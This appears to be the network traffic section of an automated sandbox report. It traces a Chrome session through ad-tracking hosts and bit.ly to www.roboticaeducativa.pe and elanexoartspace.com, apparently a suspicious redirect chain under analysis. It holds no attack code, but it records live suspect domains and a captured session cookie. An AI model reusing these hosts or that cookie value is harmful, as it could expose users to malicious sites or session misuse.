Nov 14, 2023 20:34:21.848020077 CET	49722	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:21.862356901 CET	49721	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:21.862472057 CET	443	49721	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:21.862781048 CET	49721	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:21.862818003 CET	443	49721	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:21.863208055 CET	49722	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:21.863486052 CET	443	49722	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:21.917143106 CET	49722	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:21.917165995 CET	443	49722	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:21.963131905 CET	49722	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:22.073271036 CET	443	49721	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:22.073394060 CET	49721	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:22.232501984 CET	443	49721	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:22.232630968 CET	443	49721	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:22.232846975 CET	49721	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:22.233164072 CET	49721	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:22.233194113 CET	443	49721	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:22.236103058 CET	49722	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:22.258698940 CET	443	49720	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:22.258877039 CET	443	49720	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:22.259033918 CET	49720	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:22.259591103 CET	49720	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:22.259615898 CET	443	49720	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:22.277280092 CET	443	49722	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:22.448755026 CET	443	49722	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:22.448786020 CET	443	49722	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:22.448864937 CET	443	49722	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:22.448873997 CET	49722	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:22.448920012 CET	49722	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:22.449810982 CET	49722	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:22.449847937 CET	443	49722	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:23.073434114 CET	443	49709	142.250.217.100	192.168.2.5
Nov 14, 2023 20:34:23.073512077 CET	443	49709	142.250.217.100	192.168.2.5
Nov 14, 2023 20:34:23.073594093 CET	49709	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:34:23.696887016 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:23.696965933 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:23.697071075 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:23.699816942 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:23.699848890 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:24.011198044 CET	49703	443	192.168.2.5	23.1.237.91
Nov 14, 2023 20:34:24.011447906 CET	49724	443	192.168.2.5	23.1.237.91
Nov 14, 2023 20:34:24.011485100 CET	443	49724	23.1.237.91	192.168.2.5
Nov 14, 2023 20:34:24.011554003 CET	49724	443	192.168.2.5	23.1.237.91
Nov 14, 2023 20:34:24.013165951 CET	49724	443	192.168.2.5	23.1.237.91
Nov 14, 2023 20:34:24.013181925 CET	443	49724	23.1.237.91	192.168.2.5
Nov 14, 2023 20:34:24.192930937 CET	443	49703	23.1.237.91	192.168.2.5
Nov 14, 2023 20:34:24.588520050 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:24.588684082 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:24.594449997 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:24.594476938 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:24.594943047 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:24.649343014 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:25.075423956 CET	49709	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:34:25.075485945 CET	443	49709	142.250.217.100	192.168.2.5
Nov 14, 2023 20:34:25.404476881 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:25.445260048 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:25.977363110 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:25.977430105 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:25.977454901 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:25.977475882 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:25.977518082 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:25.977539062 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:25.977543116 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:25.977611065 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:25.977680922 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:25.977680922 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:25.977680922 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:25.977682114 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:25.977703094 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:25.977736950 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:25.977761030 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:25.977794886 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:25.977812052 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:25.977930069 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:25.977988958 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:26.480566025 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:26.480628014 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:26.480664968 CET	49723	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:34:26.480683088 CET	443	49723	40.127.169.103	192.168.2.5
Nov 14, 2023 20:34:28.743144035 CET	443	49724	23.1.237.91	192.168.2.5
Nov 14, 2023 20:34:28.743211031 CET	443	49724	23.1.237.91	192.168.2.5
Nov 14, 2023 20:34:28.743345022 CET	49724	443	192.168.2.5	23.1.237.91
Nov 14, 2023 20:34:58.399527073 CET	49711	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:58.399584055 CET	443	49711	142.251.211.238	192.168.2.5
Nov 14, 2023 20:35:02.936655998 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:02.936743021 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:02.936872959 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:02.937541008 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:02.937572002 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:03.823266983 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:03.823465109 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:03.826955080 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:03.826981068 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:03.827404976 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:03.852363110 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:03.897268057 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:04.680257082 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:04.680332899 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:04.680373907 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:04.680403948 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:04.680471897 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:04.680535078 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:04.680541992 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:04.680553913 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:04.680624962 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:04.680655003 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:04.680676937 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:04.680699110 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:04.680715084 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:04.680779934 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:04.680793047 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:04.680850029 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:04.680892944 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:04.689310074 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:04.689340115 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:04.689369917 CET	49729	443	192.168.2.5	40.127.169.103
Nov 14, 2023 20:35:04.689383984 CET	443	49729	40.127.169.103	192.168.2.5
Nov 14, 2023 20:35:12.655031919 CET	49731	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:35:12.655150890 CET	443	49731	142.250.217.100	192.168.2.5
Nov 14, 2023 20:35:12.655291080 CET	49731	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:35:12.655714035 CET	49731	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:35:12.655747890 CET	443	49731	142.250.217.100	192.168.2.5
Nov 14, 2023 20:35:12.982641935 CET	443	49731	142.250.217.100	192.168.2.5
Nov 14, 2023 20:35:12.983112097 CET	49731	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:35:12.983127117 CET	443	49731	142.250.217.100	192.168.2.5
Nov 14, 2023 20:35:12.983863115 CET	443	49731	142.250.217.100	192.168.2.5
Nov 14, 2023 20:35:12.984278917 CET	49731	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:35:12.984370947 CET	443	49731	142.250.217.100	192.168.2.5
Nov 14, 2023 20:35:13.029297113 CET	49731	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:35:15.064560890 CET	49711	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:35:15.064929962 CET	443	49711	142.251.211.238	192.168.2.5
Nov 14, 2023 20:35:15.065182924 CET	49711	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:35:22.981492043 CET	443	49731	142.250.217.100	192.168.2.5
Nov 14, 2023 20:35:22.981699944 CET	443	49731	142.250.217.100	192.168.2.5
Nov 14, 2023 20:35:22.981765985 CET	49731	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:35:23.391241074 CET	49731	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:35:23.391308069 CET	443	49731	142.250.217.100	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 14, 2023 20:34:10.846359968 CET	52675	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:10.846683979 CET	50607	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:10.847223043 CET	63725	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:10.847531080 CET	56020	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:10.940181017 CET	53	52569	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:11.000399113 CET	53	52675	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:11.000437975 CET	53	50607	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:11.001032114 CET	53	63725	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:11.001342058 CET	53	56020	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:11.916713953 CET	53	62046	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:12.605123043 CET	51242	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:12.609045982 CET	60752	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:12.759722948 CET	53	51242	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:12.762423038 CET	53	60752	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:12.821094990 CET	56987	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:12.821661949 CET	61564	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:12.974852085 CET	53	56987	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:12.975518942 CET	53	61564	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:13.665029049 CET	56890	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:13.665973902 CET	59010	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:13.817878962 CET	53	56890	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:13.818686962 CET	53	59010	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:14.471863031 CET	54253	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:14.472311974 CET	62836	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:14.624982119 CET	53	54253	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:14.625395060 CET	53	62836	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:15.699507952 CET	63960	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:15.700154066 CET	58956	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:16.111152887 CET	53	63960	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:16.192930937 CET	53	58956	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:21.122550011 CET	63643	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:21.122829914 CET	62777	53	192.168.2.5	1.1.1.1
Nov 14, 2023 20:34:21.389409065 CET	53	63643	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:21.399590015 CET	53	62777	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:30.351286888 CET	53	53198	1.1.1.1	192.168.2.5
Nov 14, 2023 20:34:49.610995054 CET	53	51201	1.1.1.1	192.168.2.5
Nov 14, 2023 20:35:10.166378975 CET	53	55817	1.1.1.1	192.168.2.5
Nov 14, 2023 20:35:12.446707010 CET	53	62328	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 14, 2023 20:34:10.846359968 CET	192.168.2.5	1.1.1.1	0x2163	Standard query (0)	clients2.google.com	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:10.846683979 CET	192.168.2.5	1.1.1.1	0x91e6	Standard query (0)	clients2.google.com	65	IN (0x0001)	false
Nov 14, 2023 20:34:10.847223043 CET	192.168.2.5	1.1.1.1	0x62e6	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:10.847531080 CET	192.168.2.5	1.1.1.1	0xf3b4	Standard query (0)	accounts.google.com	65	IN (0x0001)	false
Nov 14, 2023 20:34:12.605123043 CET	192.168.2.5	1.1.1.1	0x7b32	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:12.609045982 CET	192.168.2.5	1.1.1.1	0xc01a	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 14, 2023 20:34:12.821094990 CET	192.168.2.5	1.1.1.1	0x2ef8	Standard query (0)	clickserve.dartsearch.net	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:12.821661949 CET	192.168.2.5	1.1.1.1	0xa058	Standard query (0)	clickserve.dartsearch.net	65	IN (0x0001)	false
Nov 14, 2023 20:34:13.665029049 CET	192.168.2.5	1.1.1.1	0xa666	Standard query (0)	ad.doubleclick.net	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:13.665973902 CET	192.168.2.5	1.1.1.1	0x83d	Standard query (0)	ad.doubleclick.net	65	IN (0x0001)	false
Nov 14, 2023 20:34:14.471863031 CET	192.168.2.5	1.1.1.1	0xd51f	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:14.472311974 CET	192.168.2.5	1.1.1.1	0x821d	Standard query (0)	bit.ly	65	IN (0x0001)	false
Nov 14, 2023 20:34:15.699507952 CET	192.168.2.5	1.1.1.1	0xba53	Standard query (0)	www.roboticaeducativa.pe	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:15.700154066 CET	192.168.2.5	1.1.1.1	0x663d	Standard query (0)	www.roboticaeducativa.pe	65	IN (0x0001)	false
Nov 14, 2023 20:34:21.122550011 CET	192.168.2.5	1.1.1.1	0x2361	Standard query (0)	elanexoartspace.com	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:21.122829914 CET	192.168.2.5	1.1.1.1	0xa403	Standard query (0)	elanexoartspace.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 14, 2023 20:34:11.000399113 CET	1.1.1.1	192.168.2.5	0x2163	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 14, 2023 20:34:11.000399113 CET	1.1.1.1	192.168.2.5	0x2163	No error (0)	clients.l.google.com		142.251.33.78	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:11.000437975 CET	1.1.1.1	192.168.2.5	0x91e6	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 14, 2023 20:34:11.001032114 CET	1.1.1.1	192.168.2.5	0x62e6	No error (0)	accounts.google.com		172.217.14.205	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:12.759722948 CET	1.1.1.1	192.168.2.5	0x7b32	No error (0)	www.google.com		142.250.217.100	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:12.762423038 CET	1.1.1.1	192.168.2.5	0xc01a	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 14, 2023 20:34:12.974852085 CET	1.1.1.1	192.168.2.5	0x2ef8	No error (0)	clickserve.dartsearch.net		142.251.211.238	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:13.817878962 CET	1.1.1.1	192.168.2.5	0xa666	No error (0)	ad.doubleclick.net		142.251.33.102	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:13.818686962 CET	1.1.1.1	192.168.2.5	0x83d	No error (0)	ad.doubleclick.net			65	IN (0x0001)	false
Nov 14, 2023 20:34:14.624982119 CET	1.1.1.1	192.168.2.5	0xd51f	No error (0)	bit.ly		67.199.248.10	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:14.624982119 CET	1.1.1.1	192.168.2.5	0xd51f	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:16.111152887 CET	1.1.1.1	192.168.2.5	0xba53	No error (0)	www.roboticaeducativa.pe	roboticaeducativa.pe		CNAME (Canonical name)	IN (0x0001)	false
Nov 14, 2023 20:34:16.111152887 CET	1.1.1.1	192.168.2.5	0xba53	No error (0)	roboticaeducativa.pe		50.31.176.165	A (IP address)	IN (0x0001)	false
Nov 14, 2023 20:34:16.192930937 CET	1.1.1.1	192.168.2.5	0x663d	No error (0)	www.roboticaeducativa.pe	roboticaeducativa.pe		CNAME (Canonical name)	IN (0x0001)	false
Nov 14, 2023 20:34:21.389409065 CET	1.1.1.1	192.168.2.5	0x2361	No error (0)	elanexoartspace.com		68.66.224.58	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

clients2.google.com

accounts.google.com

clickserve.dartsearch.net

ad.doubleclick.net

bit.ly

fs.microsoft.com

www.roboticaeducativa.pe

https:

elanexoartspace.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49705	142.251.33.78	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:11 UTC	0	OUT	GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1 Host: clients2.google.com Connection: keep-alive X-Goog-Update-Interactivity: fg X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda X-Goog-Update-Updater: chromecrx-117.0.5938.132 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49706	172.217.14.205	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:11 UTC	0	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
2023-11-14 19:34:11 UTC	1	OUT	Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49716	23.60.72.63	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:16 UTC	9	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2023-11-14 19:34:16 UTC	9	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (sac/2518) X-CID: 11 Cache-Control: public, max-age=144651 Date: Tue, 14 Nov 2023 19:34:16 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49718	23.60.72.63	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:16 UTC	10	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2023-11-14 19:34:17 UTC	10	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0MNkrYwAAAADiUL7L3dxqSIABzBrl++yWQ082QUEzMTUwODEwMDIxAGNlZmMyNTgzLWE5YjItNDRhNy05NzU1LWI3NmQxN2UwNWY3Zg== Cache-Control: public, max-age=144647 Date: Tue, 14 Nov 2023 19:34:16 GMT Content-Length: 55 Connection: close X-CID: 2
2023-11-14 19:34:17 UTC	11	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49717	50.31.176.165	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:17 UTC	11	OUT	GET /za HTTP/1.1 Host: www.roboticaeducativa.pe Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	50.31.176.165	443	192.168.2.5	49717	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:17 UTC	11	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Tue, 14 Nov 2023 19:34:17 GMT location: https://www.roboticaeducativa.pe/za/ alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-11-14 19:34:17 UTC	12	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helv

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.5	49719	50.31.176.165	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:17 UTC	12	OUT	GET /za/ HTTP/1.1 Host: www.roboticaeducativa.pe Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

